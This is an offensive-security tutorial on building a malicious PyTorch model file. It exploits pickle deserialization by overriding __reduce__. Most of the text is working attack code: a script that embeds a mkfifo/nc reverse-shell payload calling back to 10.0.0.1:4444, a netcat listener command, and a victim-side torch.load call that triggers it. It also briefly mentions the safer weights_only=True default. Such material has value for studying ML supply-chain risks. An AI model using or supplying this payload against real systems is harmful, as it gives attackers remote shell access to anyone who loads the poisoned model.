Create Malicious ML Model

Last modified: 2024-07-17

Model Serialization Attack

1. Install Dependencies

This technique requires PyTorch, so install it first:

# Create and activate a virtual environment to avoid polluting the host environment.
python3 -m venv myvenv
source myvenv/bin/activate
pip3 install torch

2. Create Python Script To Generate Malicious Model

Now create a Python script that generates our malicious ML model. Because torch.save serializes the model with Python's pickle module, overriding __reduce__ causes an arbitrary OS command to run as soon as the model is deserialized, e.g. when the target loads it with torch.load.

# generate_model.py
import torch
import torch.nn as nn
import os

class EvilModel(nn.Module):
	def __init__(self):
		super(EvilModel, self).__init__()
		self.dense = nn.Linear(10, 50)

	def forward(self, evil):
		return self.dense(evil)

	def __reduce__(self):
		# pickle invokes whatever this returns during deserialization,
		# so os.system(cmd) runs as soon as the model is loaded.
		# Reverse shell payload: replace 10.0.0.1/4444 with your listener.
		cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f"
		return os.system, (cmd,)

# torch.save pickles the whole EvilModel instance, embedding the payload.
evil_model = EvilModel()
torch.save(evil_model, 'evil.pth')
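
The payload works because pickle honors a class's __reduce__ method: the callable and argument tuple it returns are invoked while the object is being reconstructed. A minimal standalone sketch of the same mechanism, using a harmless id command instead of a reverse shell:

# demo_reduce.py (illustration only)
import os
import pickle

class Demo:
	def __reduce__(self):
		# pickle calls os.system("id") when this object is loaded.
		return os.system, ("id",)

payload = pickle.dumps(Demo())
pickle.loads(payload)  # prints the output of `id`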

3. Run Python Script

Now execute the script:

python3 generate_model.py

This generates the malicious model file evil.pth.
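
To confirm the payload is embedded without triggering it, you can disassemble the pickle stream inside the file. A sketch, assuming the default zipfile-based serialization format in which the pickled object graph is stored in a */data.pkl entry:

# inspect_model.py
import pickletools
import zipfile

with zipfile.ZipFile('evil.pth') as zf:
	pkl = next(n for n in zf.namelist() if n.endswith('data.pkl'))
	# The disassembly should show os.system and the injected command.
	pickletools.dis(zf.read(pkl))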

4. Compromise Target System using the Model

If our malicious model is loaded on the target system (which any training or evaluation run does first), the injected OS command executes and gives us a reverse shell. Wait for the incoming connection by starting a listener on the attack machine:

nc -lvnp 4444
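
For reference, loading the model on the target side is enough to trigger the payload; no training or inference is needed. A hypothetical victim-side snippet (note that weights_only=False was the historical torch.load default, while recent PyTorch versions default to weights_only=True, which blocks pickle payloads like this one):

# victim.py (hypothetical target-side code)
import torch

# Deserializing the pickle executes the payload before any weights are used.
model = torch.load('evil.pth', weights_only=False)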